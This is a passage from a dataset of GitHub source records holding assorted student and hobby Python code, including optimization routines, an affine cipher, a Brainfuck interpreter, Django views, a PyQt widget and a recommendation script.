fm['curve'].mean().round(3),\n em['adp'].round(3), wfm.round(3), fm['adp'].round(3)\n ])\n print(tb)\n file_to_write.write(str(tb))\n file_to_write.close()\n\n\nif __name__ == '__main__':\n # set parameters\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--gt_root', type=str, help='ground-truth root',\n default='/root/autodl-tmp/datasets/sod/gts')\n parser.add_argument(\n '--pred_root', type=str, help='prediction root',\n default='/root/autodl-tmp/datasets/sod/preds')\n parser.add_argument(\n '--data_lst', type=list, help='test dataset',\n default=['CoCA', 'CoSOD3k', 'CoSal2015'])\n parser.add_argument(\n '--model_dir', type=str, help='candidate competitors',\n default='gconet_X')\n parser.add_argument(\n '--txt_name', type=str, help='candidate competitors',\n default='exp_result')\n opt = parser.parse_args()\n if '/ep' in opt.model_dir.replace('\\\\', '/'):\n opt.model_lst = [opt.model_dir]\n else:\n opt.model_lst = sorted([os.path.join(opt.model_dir, p) for p in os.listdir(os.path.join(opt.pred_root, opt.model_dir))], key=lambda x: -int(x.split('ep')[-1]))\n\n txt_save_path = 'evaluation/eval-{}'.format(opt.txt_name)\n os.makedirs(txt_save_path, exist_ok=True)\n\n eval_res(opt, txt_save_path)\n\n","repo_name":"ZhengPeng7/MCCL","sub_path":"evaluation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"74651814827","text":"#!/usr/bin/python3\n\"\"\"defines a module base on predeseccor module: '4-square.py'\"\"\"\n\n\nclass Square:\n \"\"\"defines a square that print to stdout th square with '#'\"\"\"\n\n def __init__(self, size=0):\n \"\"\"Constructor.\n Args:\n size(int): length of side of square\n \"\"\"\n\n self.__size = size\n\n @property\n def size(self):\n \"\"\"\n Raises:\n TypeError: if size is not type(int)\n ValueError: if size < 0\n \"\"\"\n\n return self.__size\n\n @size.setter\n def size(self, value):\n if not isinstance(value, int):\n raise TypeError(\"size must be an integer\")\n if self.__size < 0:\n raise ValueError(\"size must be >= 0\")\n\n self.__size = value\n\n def area(self):\n \"\"\"return the area of square taking in size as attribute instance\"\"\"\n\n return self.__size * self.__size\n\n def my_print(self):\n \"\"\"print:\n to stdout the square with the '#' character\n empty line if size = 0\n \"\"\"\n\n if self.__size == 0:\n print()\n else:\n col = 0\n while col < self.__size:\n row = 0\n while row < self.__size:\n print(\"#\", end='')\n row += 1\n print()\n col += 1\n","repo_name":"hendrixxD/alx-higher_level_programming","sub_path":"0x06-python-classes/5-square.py","file_name":"5-square.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39983725040","text":"import numpy as np\nfrom sympy.solvers import solve\nfrom sympy import Symbol\nfrom const import func, assess_func\n\nt = Symbol('t')\n\n\ndef calculate_step(f, x, d):\n t_function = f.calc(x + t * d)\n return solve(t_function.diff(t), t)[0]\n\n\ndef fletcher_reeves_method(f, x0, epsilon1=0.1, epsilon2=0.1, M=100):\n x_list = [np.array(x0).astype(float)]\n d_list = []\n k = 0\n while k < M:\n gradient = f.gradient_value(x_list[k])\n\n if np.linalg.norm(gradient) < epsilon1:\n return x_list[k], k + 1\n\n if k != 0:\n prev_gradient = f.gradient_value(x_list[k - 1])\n beta = np.linalg.norm(gradient)**2 / np.linalg.norm(prev_gradient)**2\n d = -gradient + beta * d_list[k - 1]\n else:\n d = -gradient\n\n d_list.append(d)\n\n step = float(calculate_step(f, x_list[k], d_list[-1]))\n\n x_list.append(x_list[k] + step * d_list[k])\n\n if np.linalg.norm(x_list[k + 1] - x_list[k]) < epsilon2 \\\n and abs(f.calc(x_list[k + 1]) - f.calc(x_list[k])) < epsilon2 \\\n and len(x_list) > 2 \\\n and np.linalg.norm(x_list[k] - x_list[k - 1]) < epsilon2 \\\n and abs(f.calc(x_list[k]) - f.calc(x_list[k - 1])) < epsilon2:\n return x_list[k + 1], k + 1\n\n k += 1\n\n return x_list[-1], k\n\n\nif __name__ == '__main__':\n print(fletcher_reeves_method(assess_func, [-10, 10], epsilon1=0.1, epsilon2=0.1, M=100))\n","repo_name":"alekc080901/portfolio","sub_path":"5 семестр/Методы оптимизации/Методы первого порядка/fletcher_reeves.py","file_name":"fletcher_reeves.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20628319685","text":"import socket\n\ndef check_port_open(ip, port):\n tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp_result = tcp_sock.connect_ex((ip, port))\n tcp_sock.close()\n #print(tcp_result)\n\n if tcp_result == 0:\n return True\n else:\n return False\n","repo_name":"automatethem/python-supporter","sub_path":"python_supporter/socket.py","file_name":"socket.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74613427948","text":"# Useful function for the affine cipher\n\nimport sys\nimport cryptomath\nimport random\nSYMBOLS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890 !?.'\n\n\ndef getKeyParts(key):\n keyA = key // len(SYMBOLS)\n keyB = key % len(SYMBOLS)\n return (keyA, keyB)\n\n\ndef checkKeys(keyA, keyB, mode):\n if keyA == 1 and mode == 'encrypt':\n sys.exit('Cipher is weak if key A is 1. Choose a different key.')\n if keyB == 0 and mode == 'encrypt':\n sys.exit('Cipher is weak if key B is 0. Choose a different key.')\n if keyA < 0 or keyB < 0 or keyB > len(SYMBOLS) - 1:\n sys.exit('Key A must be greater than 0 and Key B must be between 0 and %s.' % (\n len(SYMBOLS) - 1))\n if cryptomath.gcd(keyA, len(SYMBOLS)) != 1:\n sys.exit('Key A (%s) and the symbol set size (%s) are not relatively prime. Choose a different key.' % (\n keyA, len(SYMBOLS)))\n\n\ndef encryptMessage(key, message):\n keyA, keyB = getKeyParts(key)\n checkKeys(keyA, keyB, 'encrypt')\n ciphertext = ''\n for symbol in message:\n if symbol in SYMBOLS:\n # Encrypt the symbol:\n symbolIndex = SYMBOLS.find(symbol)\n ciphertext += SYMBOLS[(symbolIndex * keyA + keyB) % len(SYMBOLS)]\n else:\n ciphertext += symbol # Append the symbol without encrypting.\n return ciphertext\n\n\ndef decryptMessage(key, message):\n keyA, keyB = getKeyParts(key)\n checkKeys(keyA, keyB, 'decrypt')\n plaintext = ''\n modInverseOfKeyA = cryptomath.findModInverse(keyA, len(SYMBOLS))\n\n for symbol in message:\n if symbol in SYMBOLS:\n # Decrypt the symbol:\n symbolIndex = SYMBOLS.find(symbol)\n plaintext += SYMBOLS[(symbolIndex - keyB) *\n modInverseOfKeyA % len(SYMBOLS)]\n else:\n plaintext += symbol # Append the symbol without decrypting.\n return plaintext\n\n\ndef getRandomKey():\n while True:\n keyA = random.randint(2, len(SYMBOLS))\n keyB = random.randint(2, len(SYMBOLS))\n if cryptomath.gcd(keyA, len(SYMBOLS)) == 1:\n return keyA * len(SYMBOLS) + keyB\n","repo_name":"HolzerSoahita/Cracking_code_python","sub_path":"Affine/affineCipherFunction.py","file_name":"affineCipherFunction.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"29262773144","text":"# -*- coding = utf-8 -*-\n# @Time : 2021/8/24 8:28\n# @Author : 陈凡亮\n# @File : String copy.py\n# @Software : PyCharm\n\ndef main():\n s1=input()\n s2=''\n for s in s1:\n if str(s) in ['a','e','i','o','u']:\n s2+=str(s)\n print(s2)\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"2017040264/buctoj-cfl","sub_path":"2021_08_24/String copy.py","file_name":"String copy.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6384898897","text":"from karakter_tip import KarakterTip\nfrom takim import Takim\nfrom karakter import Karakter\nfrom karsilasma import Karsilasma\nsovalye = KarakterTip(\"Şovalye\", 50, 3, 100)\nokcu = KarakterTip(\"Okçu\", 20, 2, 60)\nmancinik = KarakterTip(\"Mancınık\", 100, 1, 400)\n\nsovalye1 = Karakter(\"Şovalye Ahmet\", sovalye)\nokcu1 = Karakter(\"Okçu Korhan\", okcu)\nmancinik1 = Karakter(\"Mancinik Tolga\", mancinik)\nsovalye2 = Karakter(\"Şovalye Emre\", sovalye)\nokcu2 = Karakter(\"Okçu mert\", okcu)\nmancinik2 = Karakter(\"Mancinik ahmet\", mancinik)\nokcu3 = Karakter(\"Okçu yusuf\", okcu)\nmancinik3 = Karakter(\"Mancinik kubilay\", mancinik)\n\ntakim1 = Takim([sovalye1, okcu1, mancinik1, sovalye2])\ntakim2 = Takim([okcu2, mancinik2, okcu3, mancinik3])\n\nprint(\"Takim 1 can : {}\".format(takim1.can))\nprint(\"Takim 2 can : {}\".format(takim2.can))\nKarsilasma([takim1, takim2]).savas_basla()\n","repo_name":"sandiklibilgisayarprogramlama/ntp1-2023","sub_path":"hafta 13/ornek2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4473860869","text":"a = int(input(\"Enter a rectangle dimension: \"))\nb = int(input(\"Enter b rectangle dimension: \"))\n\nfor x in range(0, a):\n for y in range(0, b):\n margin = b - 1\n if y == margin:\n print(\"*\", end=\"\\n\")\n else:\n if y > 0 and x > 0 and x < (a-1):\n print(\" \", end=\"\")\n else:\n print(\"*\", end=\"\")","repo_name":"JakubIwaszek/PythonHomeworks","sub_path":"03ControlStructures/e25.py","file_name":"e25.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74613866348","text":"from . import txt2str\nfrom . import bin2array\nfrom collections import namedtuple\nimport os\n\n\nProgramDef = namedtuple(\"ProgramDef\", [\"name\",\"writedata\"])\nInputType = namedtuple(\"InputType\", [\"name\", \"path\"])\nOptions = type(\"Options\", (object,),\n dict((name,None) for name in\n [\"declare\", \"pretty\", \"defprefix\", \"op_eq\",\n \"op_concat\", \"endstatement\", \"varcomment\",\n \"headerext\", \"sourceext\", \"noheader\",\n \"headerstart\", \"headerend\",\n \"sourcestart\", \"sourceend\", \"forcenoheader\"]))\n\nprograms = [\n ProgramDef(\"txt2str\", txt2str.writedata),\n ProgramDef(\"bin2array\", bin2array.writedata),\n]\n\ndef name2var(name):\n return name.replace(\".\", \"_\")\n\ndef execute_program(program, outputdir, outputname, inputs, options):\n if options.forcenoheader:\n options.noheader = True\n if options.noheader:\n hout = None\n sout = open(\"{}/{}\".format(outputdir, outputname), \"w\")\n else:\n hout = open(\"{}/{}\".format(outputdir, outputname) + options.headerext, \"w\")\n sout = open(\"{}/{}\".format(outputdir, outputname) + options.sourceext, \"w\")\n output_varname = name2var(outputname)\n odict = { \"uppername\": output_varname.upper(), \"varname\": output_varname,\n \"name\": outputname }\n if not options.noheader:\n hout.write(options.headerend.format(**odict))\n sout.write(options.sourceend.format(**odict))\n\n for inp in inputs:\n name = inp.name\n path = inp.path\n varname= name2var(name)\n pnewline = \"\\n\" if options.pretty else \"\"\n fsize = os.stat(path).st_size\n fdict = {\"path\":path, \"varname\":varname, \"filesize\": fsize, \"name\": name,\n \"filesize_p1\":fsize + 1 }\n infile = open(path, \"r\")\n if hout != None:\n hout.write(options.declare.format(**fdict) + pnewline)\n sout.write(options.defprefix.format(**fdict) + options.op_eq + pnewline)\n program.writedata(infile, sout, options)\n sout.write(options.endstatement + \\\n options.varcomment.format(**fdict) + pnewline)\n\n if not options.noheader:\n hout.write(options.headerend.format(**odict))\n hout.close()\n\n sout.write(options.sourceend.format(**odict)) \n sout.close()\n","repo_name":"hosseinzoda/file2var","sub_path":"libfile2var/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36465156775","text":"#\n# * Intro 14. Alternating Sums\n# * Easy\n\n# * Several people are standing in a row and need to be divided into two teams. \n# * The first person goes into team 1, the second goes into team 2, the third goes \n# * into team 1 again, the fourth into team 2, and so on.\n\n# You are given an array of positive integers - the weights of the people. \n# Return an array of two integers, where the first element is the total weight \n# of team 1, and the second element is the total weight of team 2 after the \n# division is complete.\n\n# * Example\n\n# For a = [50, 60, 60, 45, 70], the output should be\n# alternatingSums(a) = [180, 105].\n\n# * Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] array.integer a\n\n# Guaranteed constraints:\n# 1 ≤ a.length ≤ 105,\n# 45 ≤ a[i] ≤ 100.\n\n# [output] array.integer\n\n#%%\n\n# * Solution 1\ndef alternatingSum(a: list) -> list:\n # ! get odd index elements and even index elements\n w1 = sum(a[::2])\n w2 = sum(a[1::2])\n return [w1, w2]\n\n\n# * Solution 2\ndef alternatingSum1(a: list) -> list:\n result = [0,0]\n for i, x in enumerate(a):\n result[i%2] += x\n \n return result\n\n\na1 = [50, 60, 60, 45, 70]\nr1 = alternatingSum1(a1)\nprint('For {}, expected: {}, result: {}'.format(a1, [180, 105], r1))\n\n#%%","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Intro/Intro14AlternatingSums.py","file_name":"Intro14AlternatingSums.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8615159065","text":"class StoreMashines:\n\n def __init__(self, name, price, quantity, number_of_lists):\n self.name = name\n self.price = price\n self.quantity = quantity\n self.numb = number_of_lists\n self.my_store_full = []\n self.my_store = []\n self.my_unit = {'device model': self.name, 'price per unit': self.price, 'quantity': self.quantity}\n def __str__(self):\n return f'{self.name} price {self.price} quantity {self.quantity}'\n\n def reception(self):\n try:\n unit = input(f'enter product ')\n unit_p = int(input(f'enter price per unit '))\n unit_q = int(input(f'enter the product quantity '))\n unique = {'device model': unit, 'price per unit': unit_p, 'quantity': unit_q}\n self.my_unit.update(unique)\n self.my_store.append(self.my_unit)\n print(f'current list -\\n {self.my_store}')\n except:\n return f'error'\n\n print(f'exit - Q, continue - Enter')\n q = input(f'---> ')\n if q == 'Q' or q == 'q':\n self.my_store_full.append(self.my_store)\n print(f'entire list -\\n {self.my_store_full}')\n return f'exit'\n else:\n return StoreMashines.reception(self)\nclass Printer(StoreMashines):\n def to_print(self):\n return f' print {self.numb} times'\n\nclass Scanner(StoreMashines):\n def to_scan(self):\n return f' scan {self.numb} times'\n\nclass Copier(StoreMashines):\n def to_copier(self):\n return f' copier {self.numb} times'\n\nunit_1 = Printer('hp', 5700, 4, 8)\nunit_2 = Scanner('kyocera', 19000, 1, 12)\nunit_3 = Copier('Xerox', 1300.4, 3, 4)\nprint(unit_1.reception())\nprint(unit_2.reception())\nprint(unit_3.reception())\nprint(unit_1.to_print())\nprint(unit_3.to_copier())","repo_name":"AlenaGB/8hw","sub_path":"4_6.py","file_name":"4_6.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26512035564","text":"\"\"\"\nCommon utility functions.\n\"\"\"\n\ndef normalize_name(name : str) -> str:\n \"\"\"\n Normalize player names by removing punctuation and suffixes.\n \"\"\"\n replace_strings = [\"Sr.\", \"Jr.\", \"III\", \"IV\", \"II\", \".\", \",\"]\n name = name.strip()\n for rep in replace_strings:\n name = name.replace(rep, \"\")\n return name.strip()\n\ndef normalize_owner(name : str) -> str:\n \"\"\"\n Standardize the owner name.\n \"\"\"\n pairs = {\n \"Simon Thomas\": \"STDK\",\n \"Jared Duffy\": \"JDBK\"\n }\n if name in pairs:\n return pairs.get(name, \"\")\n return name.split(\" \")[0].capitalize()\n","repo_name":"AdmaJonse/ff-scraper","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22444887445","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse, JsonResponse\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom rest_framework.parsers import JSONParser\r\nfrom app1.models import StudentInfo\r\nfrom app1.serializers import StudentInfoSerializer\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.response import Response\r\n# Create your views here.\r\n\r\n@api_view(['GET','POST'])\r\ndef studentInfo_list(request):\r\n \"\"\"\r\n List all code StudentInfo, or create a new StudentInfo.\r\n \"\"\"\r\n if request.method == 'GET':\r\n studentlist = StudentInfo.objects.all()\r\n serializer = StudentInfoSerializer(studentlist, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = StudentInfoSerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\ndef studentInfo_detail(request, pk):\r\n \"\"\"\r\n Retrieve, update or delete a code snippet.\r\n \"\"\"\r\n try:\r\n studentinfo = StudentInfo.objects.get(pk=pk)\r\n except StudentInfo.DoesNotExist:\r\n return HttpResponse(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'GET':\r\n serializer = StudentInfoSerializer(studentinfo)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = StudentInfoSerializer(studentinfo, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n elif request.method == 'DELETE':\r\n studentinfo.delete()\r\n return HttpResponse(status=status.HTTP_204_NO_CONTENT)\r\n","repo_name":"avanishmaurya/helloeveryone","sub_path":"restapi/app1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8693419236","text":"import sys\n\nTAPE = [0]\nTAPE_LEN = 1\nTAPE_POINTER = 0\n\nINPUT_STREAM = \"\"\n\nCODE = \"\"\nCODE_POINTER = 0\n\nOPCODES = { '+': lambda: plus(),\n '-': lambda: minus(),\n '<': lambda: less(),\n '>': lambda: greater(),\n '[': lambda: openSquare(),\n ']': lambda: closedSquare(),\n '.': lambda: dot(),\n ',': lambda: comma(),\n '@': lambda: at()\n }\n\n# >\ndef greater():\n global TAPE, TAPE_LEN, TAPE_POINTER\n TAPE_POINTER += 1\n if TAPE_POINTER == TAPE_LEN:\n TAPE.append(0)\n TAPE_LEN += 1\n\n# <\ndef less():\n global TAPE, TAPE_LEN, TAPE_POINTER\n TAPE_POINTER -= 1\n if TAPE_POINTER == -1:\n TAPE = [0] + TAPE\n TAPE_LEN += 1\n TAPE_POINTER = 0\n\n# +\ndef plus():\n global TAPE, TAPE_LEN, TAPE_POINTER\n TAPE[TAPE_POINTER] += 1\n TAPE[TAPE_POINTER] %= 256\n\n# -\ndef minus():\n global TAPE, TAPE_LEN, TAPE_POINTER\n TAPE[TAPE_POINTER] -= 1\n TAPE[TAPE_POINTER] %= 256\n\n# .\ndef dot():\n global TAPE, TAPE_LEN, TAPE_POINTER\n print(chr(TAPE[TAPE_POINTER]), end='')\n\n# ,\ndef comma():\n global TAPE, TAPE_LEN, TAPE_POINTER, INPUT_STREAM\n while len(INPUT_STREAM) == 0:\n INPUT_STREAM = input()\n TAPE[TAPE_POINTER] = ord(INPUT_STREAM[0])\n if len(INPUT_STREAM) == 1:\n INPUT_STREAM = \"\"\n else:\n INPUT_STREAM = INPUT_STREAM[1:]\n\n# [\ndef openSquare():\n global TAPE, TAPE_LEN, TAPE_POINTER, CODE, CODE_POINTER\n if TAPE[TAPE_POINTER] == 0:\n openBrackets = 1\n while openBrackets:\n CODE_POINTER += 1\n if CODE[CODE_POINTER] == '[':\n openBrackets += 1\n elif CODE[CODE_POINTER] == ']':\n openBrackets -= 1\n\n# ]\ndef closedSquare():\n global TAPE, TAPE_LEN, TAPE_POINTER, CODE, CODE_POINTER\n if TAPE[TAPE_POINTER] != 0:\n closedBrackets = 1\n while closedBrackets:\n CODE_POINTER -= 1\n if CODE[CODE_POINTER] == ']':\n closedBrackets += 1\n elif CODE[CODE_POINTER] == '[':\n closedBrackets -= 1\n\n# @\ndef at():\n global TAPE, TAPE_LEN, TAPE_POINTER, CODE, CODE_POINTER\n assert CODE_POINTER != 0\n print()\n print(\"DEBUG - Memory dump\")\n print(\"Breakpoint after instruction {0} {1}\".format(CODE_POINTER-1, CODE[CODE_POINTER-1]))\n print(\"Index\\tValue\\tPointer\")\n for i in range(TAPE_LEN):\n print(\"{0}\\t{1}\\t{2}\".format(i, TAPE[i], [\"<---\" if i == TAPE_POINTER else \"\"][0]))\n input(\"Press enter to continue execution\")\n\n# ---------------------------------------------------- #\n\nif len(sys.argv) < 2:\n print(\"Specify the file to execute as parameter\")\n exit()\n\nwith open(sys.argv[1]) as program:\n CODE = list(filter(lambda ch: ch in \"+-<>[].,@\", program.read()))\n\ncodeLength = len(CODE)\nwhile CODE_POINTER < codeLength:\n ch = CODE[CODE_POINTER]\n OPCODES[ch]()\n CODE_POINTER += 1\n","repo_name":"FiorixF1/brainphuck","sub_path":"brainphuck.py","file_name":"brainphuck.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72405086507","text":"import operator\nimport pandas as pd\nimport numpy as np\nfrom collections import OrderedDict\nimport time\n\n\ndef weight_matrix(student_id, LO_Count_pivot):\n # LO_Count=pd.read_csv('GroupdData.json')\n \"\"\"\n Input : Takes arguemnt as each student id and Group data json file(which contains count of LOs for each Student)\n Output:\n Return Wieght_Matrix, which contains weight of each LOs corresponds to respective stduents.\n \"\"\"\n LO_weight = np.array(LO_Count_pivot.iloc[student_id, :].dropna(axis=0)) # weight corresponding to each student\n return LO_weight\n\n\ndef Similarity_Matrix(pickle_file):\n \"\"\"\n Input : Takes Pickle file, which is the calculation of Similairity matrix.\n Output: Retrun Similraity matrix corresponding to each LOs.\n\n \"\"\"\n pickle1 = pd.read_pickle(pickle_file)\n Utility_data = pd.DataFrame(pickle1)\n a = list(Utility_data)\n Similarity_matrix = pd.DataFrame.from_dict(pickle1, orient='index', dtype=None)\n Similarity_matrix.columns = a\n return Similarity_matrix\n\n\ndef rating_recommendation_with_dict(top_recom, df, LO_Count_file):\n \"\"\"\n Input : Takes number of items to be recommended, dataframe df of student &LOs and LOs count json file for each student\n Output: Return list of all possible recommendtaions corresponding to each students.\n\n \"\"\"\n\n # LO_Count=pd.read_csv(\"GroupdData.json\")\n LO_Count = pd.read_csv(LO_Count_file)\n LO_list = LO_Count['object.definition.name.de-DE'].unique()\n LO_ID = ['LO_' + str(x) for x in range(len(LO_list))]\n zip(LO_ID, LO_list)\n dict_List = {}\n for k, v in zip(LO_list, LO_ID):\n dict_List[k] = v\n LO_Count['LO'] = LO_Count['object.definition.name.de-DE'].apply(lambda x: dict_List[x])\n LO_Count_pivot = LO_Count.pivot(index='actor.name', columns='LO', values='count')\n # LO_Count_pivot.head()\n ratings = []\n Similarity_matrix = Similarity_Matrix('dictionary.pickle') # Get similarity matrix for item to item\n rat1 = {}\n ratings1 = []\n for i in range(0, df.shape[0]): # Loop Till number of Students\n stu_data_index = df.iloc[[i]] # get each of Student data\n not_done = list(stu_data_index.columns[stu_data_index.isnull().any()]) # Find LOs not done by Student\n done = list(stu_data_index.dropna(axis=1)) # Get LOs done by the student\n rat, list1 = [], []\n rat1 = {}\n for k in range(0, len(not_done)):\n df_weight = weight_matrix(i, LO_Count_pivot) # Weight matrix for each student\n similarilty_student = np.array(Similarity_matrix.loc[not_done[k], done])\n rat1[(similarilty_student.dot(df_weight.T)) / similarilty_student.sum()] = not_done[k]\n od = OrderedDict(sorted(rat1.items(), reverse=True)[:top_recom])\n ratings1.append(od)\n return ratings1\n\n\ndef recommendation():\n \"\"\"\n Input :\n Output: It return list of top-N recommendation\n \"\"\"\n df= pd.read_csv('df_Student_User') #read Student and LOs data corresponding to each in dataframe df\n df.set_index('StudentID',inplace=True) #Set index of df as StudentID\n t=time.clock()\n rating_dictionary = rating_recommendation_with_dict(5,df,'GroupdData.json')\n print(time.clock()-t)\n print(\"rating matrix length= \"+str(len(rating_dictionary)))\n rating_dict_final={}\n for i in range(0,len(rating_dictionary)):\n rating_dict_final[df.index[i]]=rating_dictionary[i] #Stoting top-N recommendation in dict\n return rating_dict_final\n\n\nif __name__ == '__main__':\n recommendation()","repo_name":"grv1207/EasyLearningNOSQL","sub_path":"RecommendationEngine/TimeAwareRecommendation.py","file_name":"TimeAwareRecommendation.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11513230475","text":"import re\nimport openai\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n# set up OpenAI API\nopenai.api_key = os.environ.get('open_ai_api_key')\n\n\n# define function to read document\ndef read_document(filepath):\n with open(filepath, \"r\", encoding=\"utf8\", errors='ignore') as file:\n document = file.read()\n return document\n\n\n# define function to answer user queries\ndef answer_query(document, query):\n # preprocess query\n query = query.lower()\n query = re.sub(r'[^\\w\\s]', '', query)\n query = re.sub(r'\\d+', '', query)\n # generate response from ChatGPT\n response = openai.Completion.create(\n engine=\"text-davinci-003\", # List of models: https://platform.openai.com/docs/models\n prompt=document + \"\\nQuery: \" + query + \"\\nAnswer:\",\n max_tokens=1024,\n n=1,\n stop=None,\n temperature=0.5,\n )\n # extract answer from response\n answer = response.choices[0].text.strip()\n # return answer\n return answer\n\n\n# example usage\nfilepath = \"jokes.txt\" # place file in same directory as main.py\ndocument = read_document(filepath)\n\nquery = \"Summarize this document\" # Your prompt for what you want to do with the file\nanswer = answer_query(document, query)\nprint(answer)\n","repo_name":"marjan2k/gpt4FileReader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15349652077","text":"#!/usr/bin/env python3\n\nfrom PyQt5.QtWidgets import QWidget, QLabel, QBoxLayout, QComboBox, QPushButton, QFormLayout\n\nimport style.style_loader\nimport view.notifier\nfrom model.tournament_organizer import to\n\nclass RemovePlayerWidget(QWidget):\n\tdef __init__(self):\n\t\tsuper(RemovePlayerWidget, self).__init__()\n\t\t# self.setWindowTitle('Remove Player')\n\t\tself.setStyleSheet(style.style_loader.stylesheet)\n\n\t\tself.label = QLabel('Enter Name:', self)\n\n\t\tself.label_widget = QWidget(self)\n\t\tlabel_layout = QBoxLayout(QBoxLayout.LeftToRight)\n\t\tlabel_layout.addWidget(self.label)\n\t\tself.label_widget.setLayout(label_layout)\n\n\t\tself.name_box = QComboBox(self)\n\t\tself.name_box.setFixedWidth(210)\n\t\tself.name_box.setFixedHeight(50)\n\n\t\tself.name_box_widget = QWidget(self)\n\t\tname_box_layout = QBoxLayout(QBoxLayout.LeftToRight)\n\t\tname_box_layout.addWidget(self.name_box)\n\t\tself.name_box_widget.setLayout(name_box_layout)\n\n\t\tself.submit_btn = QPushButton('Remove Player', self)\n\t\tself.submit_btn.clicked.connect(self.submit)\n\n\t\tself.submit_btn_widget = QWidget(self)\n\t\tsubmit_btn_layout = QBoxLayout(QBoxLayout.LeftToRight)\n\t\tsubmit_btn_layout.addWidget(self.submit_btn)\n\t\tself.submit_btn_widget.setLayout(submit_btn_layout)\n\n\t\tlayout = QFormLayout()\n\t\tlayout.addRow(self.label_widget)\n\t\tlayout.addRow(self.name_box_widget)\n\t\tlayout.addRow(self.submit_btn_widget)\n\t\tself.setLayout(layout)\n\n\t\tself.show()\n\t\tself.setFixedHeight(self.height())\n\t\tself.setFixedWidth(self.width())\n\t\tself.close()\n\n\tdef update(self):\n\t\tself.name_box.clear()\n\t\tfor name in to.sorted_players(method='by_name'):\n\t\t\tself.name_box.addItem(name)\n\n\tdef submit(self):\n\t\tview.notifier.player_removed(str(self.name_box.itemText(self.name_box.currentIndex())))\n\t\tself.name_box.clear()\n\t\tself.close()\n","repo_name":"zlohner/TournamentOrganizer","sub_path":"view/remove_player_widget.py","file_name":"remove_player_widget.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42938415655","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Machine\n\n\ndef values_endpoint(request):\n \"\"\"Receive values, store them to database\"\"\"\n\n id_ = request.GET.get('id')\n machine_number = request.GET.get('num')\n status = request.GET.get('status')\n\n print(f\"id: {id_}, machine_number: {machine_number}, status: {status}\")\n\n machine_object = Machine.objects.create(\n machine_id=id_,\n machine_number=machine_number,\n status=status\n )\n \n machine_object.save()\n \n return HttpResponse(\"OK\")\n\n\ndef table_view(request):\n \"\"\"Get values from database and generate table\"\"\"\n\n \n machine_object = Machine.objects.all().order_by('-id')\n machine_object = list(machine_object)\n\n context = {\n 'table_data': machine_object,\n }\n\n return render(request, 'table_app/table.html', context)\n","repo_name":"ArkFreestyle/faizan_table","sub_path":"table_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 